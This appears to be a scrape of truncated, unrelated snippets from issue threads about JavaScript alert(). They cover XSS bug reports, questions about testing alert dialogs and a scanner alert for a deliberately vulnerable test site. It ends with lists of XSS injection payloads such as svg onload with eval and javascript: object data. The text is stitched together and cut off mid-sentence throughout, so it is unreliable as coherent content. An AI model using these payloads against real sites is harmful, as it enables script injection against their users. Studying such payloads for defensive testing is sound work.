-
It seems like the MDC component is not caring about XSS and is therefore vulnerable against "poisoned" content.
### Reproduction
```
```
![CleanShot 2024-08-21 at 19 45 40@2x](https://github…
-
We are looking for something, we can replace javascript alert with.
We have tried http://t4t5.github.io/sweetalert/ and it looks really neat and nice.
Does someone have any experience with sweeth…
-
- Site: [https://testphp.vulnweb.com](https://testphp.vulnweb.com)
- Site: [http://testphp.vulnweb.com](http://testphp.vulnweb.com)
**New Alerts**
- **Cross Site Scripting (DOM Based)** [40026…
-
Hi,
I started to play with panther since 2 days, and I've a little problem with a scenario.
I want to delete a article from my app.
The process is the following :
I press a button, an alert sho…
-
Javascript alert 혹은 prompt 함수를 통해 구현한 기능의 경우,
해당 기능을 테스팅하면
`Error: Not implemented: window.alert`
이 출력됩니다.
혹시 이와 같은 window function을 테스팅할 수 있는 방법이 따로 있나요?
-
-
Hello,
I found a XSS vulnerability in the media player. You can inject javascript code into media files metadatas.
To reproduce, open mp3 file with vlc for example, change the Artist field to "inX…
-
Hello, I would like to use a script / url to have an instance of Mutli execute some javascript. If I open the console within Multi and enter something like `javascript: alert("hello")` I get great res…
-
```
alert(123)
alert("hellox worldss");
javascript:alert("hellox worldss")
'>alert(String.fromCharCode(88,83,83))
document.write("">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromC…
-
XSS
<svg id=alert(1) onload=eval(id)>
<object/data=javascript:alert(1)>
DeC:
MOVE HERE
"}
[XSS
<svg id=alert(1) onload=eval(id)>
<object/da…